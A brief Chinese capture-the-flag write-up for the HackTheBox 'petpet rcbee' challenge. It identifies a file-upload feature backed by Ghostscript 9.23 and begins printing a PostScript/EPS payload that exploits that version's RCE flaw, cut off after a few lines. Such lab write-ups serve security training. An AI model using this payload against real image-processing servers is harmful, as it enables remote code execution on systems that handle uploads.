HTB-petpet rcbee题解
# 0x01 信息收集 这个进去一看明显就是一个文件上传 ==、 通过 docker 文件可以知道使用的是 ghostscript-9.23 这个有一个 RCE 漏洞 # Payload 上传图片的时候把这个替换进去 %!PS-Adobe-3.0 EPSF-3.0%%BoundingBox: -0 -0 100 100userdict /setpagedevice undefsavelegal{ null restore } stopped { pop } if{ legal }...
more...